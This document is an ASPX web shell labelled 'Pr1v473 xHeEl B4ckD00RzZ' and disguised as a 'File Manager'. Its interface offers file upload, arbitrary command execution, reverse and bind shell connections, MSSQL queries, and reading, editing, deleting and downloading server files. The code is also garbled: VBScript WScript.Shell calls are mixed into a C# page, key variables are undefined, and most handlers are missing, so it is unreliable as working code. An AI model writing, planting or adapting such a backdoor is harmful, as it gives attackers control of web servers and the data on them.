[$] Pr1v473 xHeEl B4ckD00RzZ [$]

<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Data.SqlClient" %>

<!DOCTYPE html>
<html>
<head>
    <title>File Manager</title>
    <style>
        body {
            background-color: black;
            color: white;
            font-family: Arial, sans-serif;
        }
        input, textarea, select {
            background-color: #333;
            color: white;
            border: 1px solid #555;
        }
        a {
            color: #00aaff;
            text-decoration: none;
        }
        a:hover {
            text-decoration: underline;
        }
        pre {
            white-space: pre-wrap;
            word-wrap: break-word;
        }
    </style>
    <script>
        function toggleVisibility(id) {
            var element = document.getElementById(id);
            if (element.style.display === 'none') {
                element.style.display = 'block';
            } else {
                element.style.display = 'none';
            }
        }
    </script>
</head>
<body>
    <h1>ASPX File Manager</h1>
    
    <%
    Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 8.8.8.8")
o = cmd.StdOut.Readall()
Response.write(o)


call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c ping 8.8.8.8")
    %>

    <form method="post" enctype="multipart/form-data">
        <input type="file" name="fileToUpload" />
        <input type="submit" name="upload" value="Upload File" />
    </form>
    <br />

    <form method="post">
        <input type="text" name="cmd" placeholder="Enter command" />
        <input type="submit" value="Execute Command" />
    </form>
    <br />

    <div>
        <button onclick="toggleVisibility('backConnectForm')">Back Connect</button> - 
        <button onclick="toggleVisibility('bindConnectForm')">Bind Connect</button> - 
        <button onclick="toggleVisibility('mssqlForm')">MSSQL Query</button>
    </div>
    <div id="backConnectForm" style="display:none;">
        <form method="post">
            <input type="text" name="host" placeholder="Back connect host" />
            <input type="text" name="port" placeholder="Back connect port" />
            <input type="submit" name="backConnect" value="Initiate Back Connect" />
        </form>
    </div>
    <div id="bindConnectForm" style="display:none;">
        <form method="post">
            <input type="text" name="port" placeholder="Bind connect port" />
            <input type="submit" name="bindConnect" value="Initiate Bind Connect" />
        </form>
    </div>
    <div id="mssqlForm" style="display:none;">
        <form method="post">
            <input type="text" name="connectionString" placeholder="MSSQL connection string" />
            <textarea name="query" placeholder="Enter MSSQL query" rows="5" cols="80"></textarea><br />
            <input type="submit" name="mssqlQuery" value="Execute Query" />
        </form>
    </div>
    <br />

    <ul>
        <%
            if (dirInfo.Parent != null)
            {
                Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dirInfo.Parent.FullName) + "'>.. (Up)</a></li>");
            }

            foreach (DirectoryInfo dir in dirInfo.GetDirectories())
            {
                Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dir.FullName) + "'>" + dir.Name + "</a></li>");
            }

            foreach (FileInfo file in dirInfo.GetFiles())
            {
                Response.Write("<li>" + file.Name + " - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&delete=" + file.Name + "'>Delete</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&edit=" + file.Name + "'>Edit</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&read=" + file.Name + "'>Read</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&download=" + file.Name + "'>Download</a></li>");
            }
        %>
    </ul>

    <%
        if (!string.IsNullOrEmpty(Request.QueryString["read"]))
        {
            string fileToRead = Path.Combine(currentPath, Request.QueryString["read"]);
            if (File.Exists(fileToRead))
            {
                string fileContent = File.ReadAllText(fileToRead);
                Response.Write("<h3>Reading File: " + Request.QueryString["read"] + "</h3>");
                Response.Write("<pre>" + Server.HtmlEncode(fileContent) + "</pre>");
            }
        }
        else if (!string.IsNullOrEmpty(Request.QueryString["edit"]))
        {
            string fileToEdit = Path.Combine(currentPath, Request.QueryString["edit"]);
            if (File.Exists(fileToEdit))
            {
                string fileContent = File.ReadAllText(fileToEdit);
                Response.Write("<h3>Editing File: " + Request.QueryString["edit"] + "</h3>");
                Response.Write("<form method='post'>");
                Response.Write("<input type='hidden' name='filePath' value='" + fileToEdit + "' />");
                Response.Write("<textarea name='fileContent' rows='20' cols='80'>" + Server.HtmlEncode(fileContent) + "</textarea><br />");
                Response.Write("<input type='submit' name='save' value='Save' />");
                Response.Write("</form>");
            }
        }
        else if (!string.IsNullOrEmpty(Request.QueryString["download"]))
        {
            string fileToDownload = Path.Combine(currentPath, Request.QueryString["download"]);
            if (File.Exists(fileToDownload))
            {
                Response.Clear();
                Response.ContentType = "application/octet-stream";
                Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(fileToDownload));
                Response.WriteFile(fileToDownload);
                Response.End();
            }
        }
    %>

</body>
</html>